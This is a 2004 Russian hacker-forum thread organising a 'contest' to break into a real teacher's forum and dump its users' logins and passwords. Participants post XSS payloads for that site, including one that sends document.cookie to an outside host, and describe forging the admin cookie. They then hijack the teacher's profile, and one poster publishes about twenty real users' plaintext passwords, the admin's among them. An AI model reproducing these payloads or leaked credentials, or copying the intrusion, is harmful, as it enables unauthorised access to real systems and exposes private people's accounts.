Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Конкурс: поимей препода (https://forum.antichat.xyz/showthread.php?t=4582)

Че Гевара 26.12.2004 12:17

Конкурс: поимей препода
 
Конкурс: поимей препода

Вчера с Егором за фигню угарали и нашли очень примитивный форум с очень примитивной защитой (хотя само понятие слова "защита" тут не употребимо) ...

В общем есть форум http://prepod.km.ru/forum/index.php

Вы там регистрируетесь, находите "уязвимость", авторизируетесь под админом и в админке выдираете из БД форума все логины и пароли зарегистрированных юзеров ...

Примичание: пароль к аккаунту администратора на форуме совпадает с паролем на e-mail ...

Кто первый с этим справится и отпишется тут, тот получит собственный статус на форуме :D

Конкурс детский, так что призы тоже детские ...

SHiTS 26.12.2004 13:54

один вопрос от начинающего хацкера-надо в html копаться или использовать id?

Че Гевара 26.12.2004 14:12

На форуме есть xss в теге [img]
Код HTML:

    [img]javascript:alert(document.cookie);[/img]
+ еще xss в поиске:
Код:

  http://prepod.km.ru/forum/search.php?text_poisk=%3Cscript%3Ejavascript:alert();%3C/script%3E
Тут куки даже на сниффер высылать не надо ...
К тому же можно было покопаться с http://prepod.km.ru/forum/forum_tems.php?t=1&cat='
Но тут все гораздо проще ...

SHiTS 26.12.2004 14:20

не,тут я не силен

madnet 26.12.2004 14:27

lol - ну и система аутентификации :)))))
2Shits тебе не советовал бы по форуму лазить, когда там админ сидит,
темболее называясь грозным именем Hacker(SHiTS)

SHiTS 26.12.2004 14:33

да пофиг,лучше скажи как пассы узнать!
я че-то где-то когда-то смотрел,по моему padonak.ru или .net ломали через куку
а тут че делать?

madnet 26.12.2004 14:35

Да млин элементарнее не может быть, вот только админ свалит Ж)

SHiTS 26.12.2004 14:37

все вы такие...

Че Гевара 26.12.2004 14:38

Ну блин ... Тут они еще думают ...
madnet
Ты то хоть прошел конкурс ? )

madnet 26.12.2004 14:41

Странноватые cookies
board_user_cook=belo4ka
board_user_id=9
а у админа как не странно
board_user_cook=prepod
board_user_id=1
Гы :)

SHiTS 26.12.2004 14:43

ну ЭТО ПОНЯТНО!!!
а узнать пассы как?!?!?!

Че Гевара 26.12.2004 14:46

Скидывайте сюда пароль его ...
Я говорил в самом начале про них ...

SHiTS 26.12.2004 14:48

ты мне или madnet'y?
расскажи как всё-таки пассы узнать???
я в скриптах не секу,больше взломом юзверей занимаюсь,поэтому напишите как вы форум крякнули?!

madnet 26.12.2004 15:07

Я теперь Лукитин :)
prepod.km.ru/forum/view_all_topic.php?m_id=22&mid=22&t=1&cat=2

Учитель истории и права высшей категории, методист по истории ЮАО г. Москвы, лауреат премии Вильчанской и "Грант Москвы", Учитель года Москвы - 2004, автор нескольких пособий по истории России, статей и мультимедийных изданий. Увлечения: работа, театр, музыка, ИТ.

madnet 26.12.2004 15:09

Гы-гы админ в панике смотрите пока не удалил:)

madnet 26.12.2004 15:10

Злой какой забанил 2 proxy Ж)

Че Гевара 26.12.2004 15:11

Вложений: 1
Конкурс усложнился )
Когда препод зашел на свой форум и увидел, что у него зарегистрировались страшные хакеры с никами Hacker(SHiTS) (c паролем 123456)& belo4ka (с паролем belka), то препод страшно пересрался и забанил их с форума ! Теперь взломщикам надо обойти бан злостного преподавателя Центра Исторического Образования и поиметь его по самое нехочу =)


madnet 26.12.2004 15:13

:)
Это дейсвительно сложно :)

madnet 26.12.2004 15:14

Он убил мою белочку :(

Че Гевара 26.12.2004 15:25

Что за сцука ента белочка ?
Что она оставляет мне мессаги:
Цитата:

:)
Где можно скачать контрольные для 10
класса по математике
[img]img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;[/img]
Как найду ее - за кафедрой выебу! =)))

madnet 26.12.2004 15:28

Звиняйте она больше не будет
Cry :-(

SHiTS 26.12.2004 18:13

мда, Че Гевара не на шутку прикололся.
насчет бана -фиг с ним всё равно не буду даже париться,бабки на нет жалко

madnet 26.12.2004 18:24

Следующий раз прежде подумай, а потом делай
Lol :)

SHiTS 26.12.2004 18:28

а че думать?
тут и так всё ясно.

madnet 26.12.2004 18:33

Что-то не вижу паролей от тебя :)

SHiTS 26.12.2004 19:00

забей .......

4ugak[NhT] 27.12.2004 17:25

Все юзеры разбанены!! Конкурс действительно легкий)))

'prepod', 'ctvetochek'
'Андрей Лукутин', 'ctvetochek'
'Юлия', '175427',
'Аня', 'z,kjrj',
'Adia', '232323',
'31337', '31337',
'egro', '123454321',
'SHiTS', '123456',
'belo4ka', 'belka',
'Hacker(SHiTS)', '123456',
'ne_belo4ka', 'belka',
'Синев', 'sex',
'Смирнов', 'spirt',
'Petrov', 'piter',
'Ass', 'ass', 'ass@ass.ass',
'Zed', 'zed',
'Slava', 'qqq',
'Привет от SHiTS', '123456',
'pepsicola', 'nenavijuavtoinspekto',
'Цой', 'musik',
'Admin', 'qwerty'

Че Гевара 27.12.2004 17:50

Гы )
Наконец-то злого препода поимели по самое нехочу )
Всех благодаою за участие ))

madnet


4ugak[NhT]

SHiTS
(тебе за яростное стремление впендюрить преподу)

Пишите какие статусы вы хотите ...

madnet 27.12.2004 17:51

Хочу статус смерти :) +

4ugak[NhT] 27.12.2004 17:55

2madnet

только увидел конкурс и моментом прошел)

madnet 27.12.2004 17:59

Ты молодец :)

Че Гевара 27.12.2004 18:00

Цитата:

Сообщение от madnet
Хочу статус смерти :) +

Как писаться будет ? "Страшная Смерть" ? :D

madnet 27.12.2004 18:05

Я думаю просто и скромно
СМЕРТЬ

madnet 27.12.2004 18:46

big tnx
КРАСАВА
):-}

PEPSICOLA 28.12.2004 02:45

http://www.cast.uark.edu/~kkvamme/cool.gif

madnet 28.12.2004 03:36

Pepsi,
Ты как раз просил меня поменять аватар, а то страшный,
надеюсь угодил тебе? Ж)

SHiTS 28.12.2004 10:57

а можно тож че-нить?а?

SHiTS 28.12.2004 11:11

я бы хотел такую подпись))
кулхацкер
штоб стимул был)))

madnet 28.12.2004 14:44

Лучше HACKER(SHiTS) !!! :)
Как на prepode :)

SHiTS 28.12.2004 14:54

ага типа
SHiTS,HACKER(SHiTS)
или дамм,ван дамм,клод ван дамм,жан клод ван дамм
гыгы
КУЛХАЦКЕР


Время: 18:09